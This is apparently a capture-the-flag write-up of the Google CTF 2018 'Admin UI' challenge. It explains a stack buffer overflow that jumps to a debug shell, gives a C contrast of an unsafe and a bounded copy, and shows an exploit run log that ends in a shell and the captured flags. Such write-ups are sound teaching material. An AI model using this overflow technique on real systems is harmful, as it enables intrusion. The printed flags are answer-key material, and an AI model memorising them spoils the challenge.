This is the last part of the series and the most interesting one: we finally get to command execution. Unfortunately there is a variable `_ZL13shell_enabled`, and it is set to false.
We can still execute some built-in commands, though. The `debug` command prints a lot of interesting information about memory. The most important piece is the `_ZL13cmds_executed` variable and its address: `shell_enabled` sits right after it in memory!
There is also an `echo` command, which calls printf with our input as the first parameter. This would allow us to perform a format string attack.
But there is an easier solution. ASLR is disabled for this binary, so addresses are constant and we don't need to leak them at all (we can read them in IDA).
The second vulnerability is a buffer overflow. If we send 0x38 bytes of any letter followed by the address of the debug_shell() call (the `if` branch that would execute if the shell_enabled variable were set to true), the application returns to that address.
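To make the bug class concrete, here is an added example (not the challenge binary's code, whose source is not shown on this page) of the vulnerable pattern beside a bounded version. The 0x38-byte buffer size is taken from the overflow distance above; the function names and the `hunter2` password are assumptions for illustration only.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumption: 0x38 is the distance the writeup gives from the start of
 * the password buffer to the saved return address, so it is used as the
 * buffer size here. The real buffer size in the binary is not shown. */
#define PW_BUF_LEN 0x38

/* Vulnerable pattern: an unbounded copy into a fixed-size stack buffer.
 * Bytes beyond PW_BUF_LEN spill over whatever follows on the stack,
 * including the saved return address. Shown for contrast; not called. */
int check_secondary_password_unsafe(const char *line, const char *expected) {
    char buf[PW_BUF_LEN];
    strcpy(buf, line);                 /* no length check at all */
    return strcmp(buf, expected) == 0;
}

/* Hardened version: the length is checked before the copy and an
 * over-long line is rejected outright rather than silently truncated
 * (a truncated copy would still leave the rest of the line queued up
 * to be parsed as the next command). Returns 1 if accepted, else 0. */
int check_secondary_password_safe(const char *line, const char *expected) {
    char buf[PW_BUF_LEN];
    size_t n = strlen(line);
    if (n >= sizeof buf)
        return 0;                      /* too long: refuse */
    memcpy(buf, line, n + 1);          /* bounded copy, includes the NUL */
    return strcmp(buf, expected) == 0;
}

/* Feeds a constructed over-long line (0x38 'A's plus 8 more bytes,
 * mirroring the overflow layout above) to the hardened checker.
 * Returns 1 if the line was rejected as it should be. */
int overlong_line_is_rejected(void) {
    char line[PW_BUF_LEN + 8 + 1];
    memset(line, 'A', sizeof line - 1);
    line[sizeof line - 1] = '\0';
    return check_secondary_password_safe(line, "hunter2") == 0;
}

int main(void) {
    printf("valid password accepted: %d\n",
           check_secondary_password_safe("hunter2", "hunter2"));
    printf("over-long line rejected: %d\n", overlong_line_is_rejected());
    return 0;
}
```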
[exploit](https://github.com/BOAKGP/CTF-Writeups/blob/master/Google%20CTF%202018%20Quals%20Beginners%20Quest/Admin%20UI/exploit.py)
When you run the exploit you have to type `quit` twice, and then you have the shell.
```
$ ./exploit.py
[+] Opening connection to mngmnt-iface.ctfcompetition.com on port 1337: Done
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
1
Please enter the backdoo^Wservice password
CTF{I_luv_buggy_sOFtware}
:
! Two factor authentication required !
Please enter secret secondary password
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
:
Authenticated
[*] Switching to interactive mode
> Unknown command ''
> Unknown command 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAA'
> Bye!
$ ls -la
total 144
drwxr-xr-x 3 user user 4096 Jun 18 08:25 .
drwxr-xr-x 3 nobody nogroup 4096 May 25 13:19 ..
-rw-r--r-- 1 user user 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 user user 3771 Aug 31 2015 .bashrc
-rw-r--r-- 1 user user 655 May 16 2017 .profile
-rw-r--r-- 1 nobody nogroup 26 May 24 15:03 an0th3r_fl44444g_yo
-rw-r--r-- 1 nobody nogroup 25 Jun 18 08:25 flag
-rwxr-xr-x 1 nobody nogroup 111128 Jun 18 08:25 main
drwxr-xr-x 2 nobody nogroup 4096 Jun 18 08:25 patchnotes
$ cat an0th3r_fl44444g_yo
CTF{c0d3ExEc?W411_pL4y3d}
```
Flag: `CTF{c0d3ExEc?W411_pL4y3d}`